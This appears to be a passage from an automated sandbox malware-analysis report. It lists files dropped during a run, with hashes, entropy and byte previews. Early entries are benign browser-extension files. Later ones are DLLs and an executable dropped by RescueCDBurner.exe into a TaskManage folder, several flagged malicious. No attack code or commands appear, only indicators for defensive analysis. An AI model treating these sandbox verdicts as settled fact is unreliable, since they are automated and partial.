C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11406
Entropy (8bit):	5.745845607168024
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
MD5:	0A68C9539A188B8BB4F9573F2F2321D6
SHA1:	E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
SHA-256:	39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
SHA-512:	13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417954053901
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
MD5:	5E425DC36364927B1348F6C48B68C948
SHA1:	9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
SHA-256:	32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
SHA-512:	C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	122218
Entropy (8bit):	5.439997574414675
Encrypted:	false
SSDEEP:	1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
MD5:	67C4451398037DD1C497A1EA98227630
SHA1:	F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
SHA-256:	59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
SHA-512:	17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	130866
Entropy (8bit):	5.425065147784983
Encrypted:	false
SSDEEP:	1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
MD5:	1A8A1F4E5BA291867D4FA8EF94243EFA
SHA1:	B25076D2AE85BD5E4ABA935F758D5122CCB82C36
SHA-256:	441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
SHA-512:	F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.6049974235008655
Encrypted:	false
SSDEEP:	49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:	FECC62A37D37D9759E6B02041728AA23
SHA1:	0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:	94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:	698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6487736
Entropy (8bit):	7.518089126573906
Encrypted:	false
SSDEEP:	98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:	11C8962675B6D535C018A63BE0821E4C
SHA1:	A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:	421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:	3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	664064
Entropy (8bit):	6.953961612144461
Encrypted:	false
SSDEEP:	12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
MD5:	A147F46E2E1F315AA219482D645BEED9
SHA1:	073A6AE153A903B31463FA33512AA93DA1E3BB6F
SHA-256:	2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
SHA-512:	690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\hypochondriac.xlsx

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	60283
Entropy (8bit):	4.569551839311306
Encrypted:	false
SSDEEP:	1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
MD5:	3620E2D48EB60EC875FB9262ABC87D2B
SHA1:	55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
SHA-256:	E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
SHA-512:	CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
Malicious:	false
Preview:	.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll

Download File

Process:	C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
